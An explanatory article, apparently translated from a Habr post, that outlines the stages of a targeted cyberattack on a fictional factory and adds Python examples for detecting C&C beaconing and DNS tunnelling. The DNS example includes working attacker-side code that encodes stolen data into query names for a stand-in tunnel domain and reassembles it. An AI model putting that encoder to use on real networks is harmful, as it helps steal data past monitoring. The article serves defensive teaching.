
What modern targeted attacks look like


Targeted cyber attacks differ from mass attacks in that they are aimed at a specific company or organization. They are the most effective kind of attack because they are planned and personalized using information gathered about the victim. Everything starts with reconnaissance; as a rule, this is the longest and most laborious part of the operation. Only then is the attack prepared and carried out. From the outside it all looks quite complicated, and it seems that only elite crackers could pull it off. Reality looks different.

If in 2017 the share of non-targeted attacks was 90% and targeted attacks accounted for only 9.9%, then 2018 and 2019 saw a steady growth in targeted attacks. If they are so hard to perform, why are there more of them? How are modern targeted attacks carried out, and why are hackers switching from mass attacks to targeted ones? And why is the number of such incidents attributable to well-known cyber groups not as large as it might seem? Let's sort it out.

Imagine a group of hackers who have decided to attack a factory that produces curly toothpicks in order to steal the secret of their production and sell it to competitors. Let's consider what stages such an attack might consist of and what tools are needed at each of them.

Stage 1. Information gathering


The hackers need to collect as much information as possible about the plant: its management and employees, its network infrastructure, and its suppliers and customers. To do this, the attackers examine the plant's website and every IP address belonging to the enterprise with a vulnerability scanner. From public sources they compile a list of employees and study their social-network profiles and the sites they visit regularly. Based on the information gathered, an attack plan is drawn up and all the necessary utilities and services are selected.

Tools: vulnerability scanner, website visit-logging services, stolen email and website credentials.

Stage 2. Organization of entry points


Using the information collected, the hackers prepare to penetrate the company's network. The easiest way in is phishing emails with malicious attachments or links.

The criminals do not need social-engineering skills or the ability to develop web exploits for different browser versions: everything they need is available as a service on hacker forums and on the darknet. For a relatively small fee, such specialists will prepare phishing emails based on the data collected. Malicious content for websites can likewise be bought as "malicious-code-installation-as-a-service", and the customer does not need to understand the implementation details. The script detects the victim's browser and platform and uses the matching version of the exploit to compromise the device.

Tools: "malicious code as a service", a service for developing malicious phishing emails.

Stage 3. Connecting to the command-and-control server


After penetrating the plant's network, the hackers need a foothold from which to secure their position and carry out further actions. This can be a compromised computer with a backdoor installed that accepts commands from a command-and-control server on dedicated "bulletproof" hosting (also called abuse-resistant hosting, or BPHS, bulletproof hosting service). Another approach is to set up the command server directly inside the enterprise infrastructure, in our case the plant; in that case the traffic between the malware installed on the network and the server does not even have to be hidden.

[Image. Source: Trend Micro]

Cybercrime markets offer various options for such servers, packaged as full-fledged software products for which technical support is even provided.

Tools: "bulletproof" (abuse-resistant) hosting, C&C server-as-a-service.
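Whether the C&C server sits on bulletproof hosting or inside the plant, the backdoor has to poll it for commands, and that polling is usually what gives an otherwise encrypted channel away. The following is an added example (not code from the original article or from Trend Micro) of a defender-side check: it takes a constructed outbound-connection log of the shape a firewall or proxy log reduces to, and flags source/destination pairs whose connection intervals are too regular to be human. The host names, addresses (from the documentation ranges) and thresholds are all assumptions made for the illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed outbound-connection log, one line per connection:
# "<ISO time> <src host> <dst>:<port>". 203.0.113.0/24 and 198.51.100.0/24 are
# documentation address ranges; none of this is real traffic.
_BASE = datetime(2019, 7, 22, 10, 0, 0)
# Hypothetical implant polling its C&C every ~300 s with a little jitter.
_BEACON_OFFSETS = [0, 297, 605, 898, 1203, 1499, 1810, 2101]
# A user browsing: bursts and long idle gaps, no fixed period.
_BROWSE_OFFSETS = [5, 17, 140, 141, 142, 900, 905, 2000]


def _line(offset, src, dst):
    return f"{(_BASE + timedelta(seconds=offset)).isoformat()} {src} {dst}"


CONN_LOG = sorted(
    [_line(o, "10.0.0.17", "203.0.113.5:443") for o in _BEACON_OFFSETS]
    + [_line(o, "10.0.0.23", "198.51.100.9:443") for o in _BROWSE_OFFSETS]
    # same C&C address touched twice by another host: too few samples to judge
    + [_line(o, "10.0.0.23", "203.0.113.5:443") for o in (50, 61)]
)


def find_beacons(log_lines, min_events=6, max_cv=0.1):
    """Return (src, dst, mean_gap_seconds, cv) for every src/dst pair whose
    connection intervals are regular enough to look like automated polling.
    The coefficient of variation (stdev / mean of the gaps) stays near 0 for
    a timer even with small jitter and is well above 1 for human-driven
    traffic. Thresholds are illustrative; tune them against your baseline."""
    per_pair = defaultdict(list)
    for line in log_lines:
        ts, src, dst = line.split()
        per_pair[(src, dst)].append(datetime.fromisoformat(ts))

    beacons = []
    for (src, dst), times in per_pair.items():
        if len(times) < min_events:
            continue                      # not enough samples for periodicity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean == 0:
            continue                      # duplicate timestamps, not a period
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons.append((src, dst, round(mean), round(cv, 3)))
    return beacons


if __name__ == "__main__":
    for src, dst, period, cv in find_beacons(CONN_LOG):
        print(f"possible beacon: {src} -> {dst} every ~{period}s (cv={cv})")
```

The check deliberately ignores packet contents, so it works just as well against TLS to a bulletproof host as against plaintext; what it cannot see is an implant that randomizes its sleep widely or hides inside a legitimately periodic service, which is why the coefficient-of-variation threshold is a starting point rather than a verdict.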

Stage 4. Lateral movement


It is far from certain that access to the first compromised computer in the plant's infrastructure will yield the information on the production of curly toothpicks. To get to it, the attackers need to find out where the main secret is stored and how to reach it.

This stage is called lateral movement. As a rule, it is carried out with scripts that automate network scanning, obtaining administrative privileges, dumping databases and searching for documents stored on the network. The scripts can rely on operating-system utilities or download custom tooling that is available for an additional fee.

Tools: scripts for scanning the network, obtaining administrative privileges, dumping data and searching for documents.

Stage 5. Managing the attack


The days when hackers had to sit buried in a terminal, hammering out command after command to keep an attack going, are gone. Modern cybercriminals use convenient web interfaces, panels and dashboards to coordinate their work. The stages of the attack are displayed as visual graphs, the operator is notified of problems as they arise, and possible solutions may be suggested.

Tools: web-based attack control panel.

Stage 6. Theft of information


Once the necessary information has been found, it must be transferred from the factory network to the hackers as quickly and quietly as possible. The transfer has to be disguised as legitimate traffic so that the DLP system does not notice anything. For this, hackers can use secure connections, encryption, packing and steganography.

Tools: crypters, encryptors, VPN tunnels, DNS tunnels.
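A DNS tunnel is the exfiltration channel from the list above that most often slips past a DLP system, because DNS is allowed out of almost every network and a DLP looking at file transfers never sees a document leave. The following is an added example, not code from the original article: the attacker half encodes a stolen document into DNS query names and the receiver half reassembles it, and the defender half runs over a constructed DNS query log and flags the domain whose subdomains carry data. The tunnel zone, the "secret", the log format and the thresholds are all assumptions made for the illustration.

```python
import base64
import math
from collections import defaultdict

# Hypothetical attacker-controlled zone (an assumption, not from the article).
TUNNEL_DOMAIN = "cdn-status-check.example"
# Constructed "trade secret" standing in for the stolen production documents.
SECRET = b"curly toothpick recipe: soak birch in glycerin for 9 hours"


def chunk_exfil(data, domain, label_len=40):
    """Attacker side: base32-encode the payload (DNS names are case-insensitive,
    so base64 would be mangled by resolvers) and split it into queries of the
    form <seq>.<chunk>.<domain>. Each label stays under the 63-octet limit."""
    enc = base64.b32encode(data).decode().rstrip("=").lower()
    return [f"{seq}.{enc[i:i + label_len]}.{domain}"
            for seq, i in enumerate(range(0, len(enc), label_len))]


def reassemble(qnames, domain):
    """Receiver side (the authoritative server for `domain`): order the chunks
    by sequence number and undo the base32 encoding."""
    chunks = {}
    for q in qnames:
        if not q.endswith("." + domain):
            continue
        seq, chunk = q.split(".")[:2]
        chunks[int(seq)] = chunk
    enc = "".join(chunks[i] for i in sorted(chunks)).upper()
    enc += "=" * (-len(enc) % 8)          # restore base32 padding
    return base64.b32decode(enc)


def shannon_entropy(s):
    """Bits per character: ~0 for a repeated label, up to 5 for random base32."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Naive: the last two labels. Production code should use the Public Suffix
    List so that host.example.co.uk groups under example.co.uk."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_tunnels(log_lines, min_queries=3, min_avg_sub_len=20.0,
                   min_unique_ratio=0.8, min_entropy=3.0):
    """Defender side: flag registered domains whose subdomains look like carried
    data, i.e. many distinct, long, high-entropy labels. Thresholds are
    illustrative; legitimate CDNs and anti-spam lookups also use long labels,
    so in practice allow-list those before alerting."""
    stats = defaultdict(lambda: {"queries": 0, "subs": set(), "chars": ""})
    for line in log_lines:
        _ts, _client, qname = line.split()
        dom = registered_domain(qname)
        sub = qname[:-len(dom) - 1] if qname != dom else ""
        s = stats[dom]
        s["queries"] += 1
        s["subs"].add(sub)
        s["chars"] += sub.replace(".", "")
    flagged = []
    for dom, s in stats.items():
        if s["queries"] < min_queries:
            continue
        avg_len = len(s["chars"]) / s["queries"]
        unique_ratio = len(s["subs"]) / s["queries"]
        if (avg_len >= min_avg_sub_len and unique_ratio >= min_unique_ratio
                and shannon_entropy(s["chars"]) >= min_entropy):
            flagged.append(dom)
    return flagged


# Constructed DNS query log, "<timestamp> <client> <qname>": ordinary lookups
# interleaved with the tunnel queries produced by chunk_exfil().
BENIGN = ["www.example.com", "mail.example.com", "www.example.com",
          "cdn.example.net", "www.example.com", "mail.example.com"]
DNS_LOG = [f"2019-07-22T10:00:{i:02d} 10.0.0.17 {q}"
           for i, q in enumerate(BENIGN + chunk_exfil(SECRET, TUNNEL_DOMAIN))]

if __name__ == "__main__":
    print("suspected tunnel domains:", detect_tunnels(DNS_LOG))
    print("receiver got back:", reassemble(chunk_exfil(SECRET, TUNNEL_DOMAIN),
                                           TUNNEL_DOMAIN))
```

Note what the detector keys on: not the payload, which is encoded, but the shape of the names. Repeated short labels such as `www` score near zero entropy and never trip the length check, while a zone receiving a stream of long, never-repeating subdomains does, which is exactly the signal a DNS-aware DLP or resolver log review should be producing.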

Attack result


Our hypothetical hackers easily penetrated the factory network, found the information their customer needed and stole it. All they needed was a relatively small sum to rent hacker tools, which they more than recouped by selling the toothpick secret to competitors.

Conclusions


Everything needed to conduct a targeted attack is readily available on the darknet and on hacker forums. Anyone can buy or rent a toolkit, and supply is so plentiful that sellers offer technical support and keep cutting prices. In this situation there is no point wasting time firing cannons at hummingbirds with large-scale malicious campaigns: a few targeted attacks bring a significantly greater return.

Elite hacker groups also follow the trend and diversify their risks. They understand that conducting attacks is dangerous, albeit lucrative, work. While preparing attacks, and in the pauses between them, one still needs to eat, so extra income does not hurt. Why not let others use their tooling for a decent reward? This gave rise to a mass supply of hacking services for rent and, by the laws of the market, drove down their price.

[Image. Source: Trend Micro]

As a result, the barrier to entry into the targeted-attack segment has dropped, and analysts have recorded growth in the number of such attacks year after year.

Another consequence of tool availability on cybercrime marketplaces is that attacks by APT groups are now much harder to distinguish from attacks carried out by criminals who rent those tools. Protection against APTs and against unorganized cybercriminals therefore requires almost the same measures, although countering APTs takes more resources.

The only empirical criteria by which the actions of APT hackers can be identified are the complexity and originality of the attacks, the use of unique tooling and exploits that are not available on underground marketplaces, and a higher level of skill with the tools.

Source: https://habr.com/ru/post/461297/
